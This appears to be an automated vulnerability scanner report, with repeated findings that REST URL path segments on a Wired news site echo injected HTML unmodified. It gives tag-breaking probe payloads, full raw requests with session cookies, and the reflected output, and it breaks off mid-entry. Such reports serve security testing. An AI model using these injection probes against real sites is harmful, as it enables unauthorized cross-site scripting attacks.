<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newscc419"><a>7899aecd94e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7763"><a>37b818daaa2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencef7763"><a>37b818daaa2/discoveries/news/2008/05/dayintech_0508 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:23 GMT Date: Sun, 21 Nov 2010 23:11:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencef7763"><a>37b818daaa2 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1784"><a>144b05b950e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesa1784"><a>144b05b950e/news/2008/05/dayintech_0508 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:38 GMT Date: Sun, 21 Nov 2010 23:11:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesa1784"><a>144b05b950e c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a08c"><a>d3d8da4d6ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news4a08c"><a>d3d8da4d6ca/2008/05/dayintech_0508 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:50 GMT Date: Sun, 21 Nov 2010 23:11:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news4a08c"><a>d3d8da4d6ca"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac1f"><a>5403a7340a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceaac1f"><a>5403a7340a/discoveries/news/2008/05/dayintech_0529 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:26 GMT Date: Sun, 21 Nov 2010 23:11:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceaac1f"><a>5403a7340a ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d1a4"><a>42968683ca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries9d1a4"><a>42968683ca3/news/2008/05/dayintech_0529 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:41 GMT Date: Sun, 21 Nov 2010 23:11:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries9d1a4"><a>42968683ca3 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10b14"><a>883fb4baad9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news10b14"><a>883fb4baad9/2008/05/dayintech_0529 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:53 GMT Date: Sun, 21 Nov 2010 23:11:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news10b14"><a>883fb4baad9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4df74"><a>5147fa5c783 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science4df74"><a>5147fa5c783/discoveries/news/2008/07/dayintech_0703 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:55 GMT Date: Sun, 21 Nov 2010 23:11:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science4df74"><a>5147fa5c783 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b3d"><a>3ce8d2bac62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesb3b3d"><a>3ce8d2bac62/news/2008/07/dayintech_0703 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:12 GMT Date: Sun, 21 Nov 2010 23:12:12 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesb3b3d"><a>3ce8d2bac62 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56075"><a>6061ca3c823 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news56075"><a>6061ca3c823/2008/07/dayintech_0703 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:25 GMT Date: Sun, 21 Nov 2010 23:12:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news56075"><a>6061ca3c823"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db02"><a>f874204744b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science3db02"><a>f874204744b/discoveries/news/2008/07/dayintech_0709 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:03 GMT Date: Sun, 21 Nov 2010 23:12:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science3db02"><a>f874204744b ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9fd1"><a>86c7e4de0c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesd9fd1"><a>86c7e4de0c/news/2008/07/dayintech_0709 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:20 GMT Date: Sun, 21 Nov 2010 23:12:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesd9fd1"><a>86c7e4de0c c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6b98"><a>dbfd5c107d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb6b98"><a>dbfd5c107d/2008/07/dayintech_0709 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:33 GMT Date: Sun, 21 Nov 2010 23:12:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb6b98"><a>dbfd5c107d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff39c"><a>59bffd6a4f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceff39c"><a>59bffd6a4f8/discoveries/news/2008/08/dayintech_0812 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:03 GMT Date: Sun, 21 Nov 2010 23:12:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceff39c"><a>59bffd6a4f8 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 644ae"><a>6b5c8b0db9b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries644ae"><a>6b5c8b0db9b/news/2008/08/dayintech_0812 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:19 GMT Date: Sun, 21 Nov 2010 23:12:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries644ae"><a>6b5c8b0db9b c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce779"><a>d1da1c60cd6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsce779"><a>d1da1c60cd6/2008/08/dayintech_0812 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:30 GMT Date: Sun, 21 Nov 2010 23:12:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsce779"><a>d1da1c60cd6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7b19"><a>3c1f34f3de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceb7b19"><a>3c1f34f3de/discoveries/news/2008/08/dayintech_0814 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:07 GMT Date: Sun, 21 Nov 2010 23:12:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceb7b19"><a>3c1f34f3de ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9bda"><a>691a36c089b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesa9bda"><a>691a36c089b/news/2008/08/dayintech_0814 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:24 GMT Date: Sun, 21 Nov 2010 23:12:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesa9bda"><a>691a36c089b c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d6e"><a>917d98e62c1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
